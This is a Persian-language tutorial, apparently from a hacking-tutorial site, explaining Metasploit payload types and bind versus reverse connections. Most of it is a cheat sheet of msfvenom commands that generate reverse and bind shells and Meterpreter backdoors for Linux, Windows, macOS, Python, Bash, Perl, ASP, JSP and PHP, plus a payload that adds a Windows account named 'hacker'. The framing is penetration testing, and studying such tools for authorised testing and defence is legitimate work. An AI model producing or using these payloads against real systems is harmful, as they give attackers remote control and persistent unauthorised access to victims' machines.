ساخت پیلود برای انواع پلتفرم ها

آموزش ساخت پیلود برای انواع سیستم ها

با سلام و درود خدمت کاربران محترم kaliboys.com. در این آموزش سعی می کنیم تا با ساخت پیلود برای انواع پلتفرم ها در فریم ورک محبوب متاسپلویت آشنا بشیم. همچنین با مفهموم کلی پیلود و انواع آن اشنا خواهیم شد.

پیلود(payload) چیست؟

یک پیلود در Metasploit به یک ماژول سوءاستفاده اشاره دارد. سه نوع مختلف از پیلودها در Metasploit وجود دارند که عبارتند از:

۱- Singles: کاملا محرمانه و مستقل عمل می کنند.

۲- Stagers: یک اتصال شبکه ای بین مهاجم و قربانی را ایجاد می کند.

۳- Stages: از جمله ویژگی های این نوع پیلودها، عدم محدودیت سایز در meterpreter ، تزریق VNC و شل (ipwn) برای ایفون است.

تنوع پیلود ها اجازه می دهد تا در انواع مختلف از سناریو های تست نفوذ مفید باشند. این که آیا یک پیلود Stages است یا نه، میتوان با وجود “/” در نام آن تشخیص داد. به مثال های زیر دقت کنید:

windows/shell_bind_tcp یک پیلود غیر مرحله ای(Stages) است، در حالی که windows/shell /bind_tcp یک پیلود دو مرحله ای است که شامل (stager (bind_tcp و (stage (shell است.

تفاوت روش bind با Reverse در چیست؟

در روش bind یک پورت روی سیستم تارگت باز می شود تا نفوذگر به آن پورت متصل شود. ولی در روش Reverse، هکر یک پورت بر روی سیستم خود باز می کند تا سیستم تارگت به سیستم او وصل شود.

شل با دسترسی Meterpreter برای سیستم عامل لینوکس

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf shell.elf

شل معکوس برای سیستم عامل لینوکس

msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf shell.elf
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf shell.elf

شل با دسترسی Meterpreter برای سیستم عامل ویندوز

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe shell.exe
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe shell.exe

شل معکوس برای سیستم عامل ویندوز

msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe shell.exe

شل معکوس برای سیستم عامل مک

msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho shell.macho
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho shell.macho

پیلود برای ایجاد یوزر و پسورد در سیستم عامل ویندوز

msfvenom -p windows/adduser USER=hacker PASS=password -f exe useradd.exe

شل معکوس برای Python

msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw shell.py

شل معکوس برای Bash

msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw shell.sh

شل معکوس برای Perl 

msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw shell.pl

شل با دسترسی Meterpreter برای پلتفرم Asp 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp shell.asp

شل معکوس برای Java Script

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw shell.jsp

شل با دسترسی Meterpreter با زبان PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw shell.php

شل معکوس برای PHP

msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw phpreverseshell.php 

Always work together to make progress

 

نوشتن دیدگاه

آدرس ایمیل شما منتشر نخواهد شد.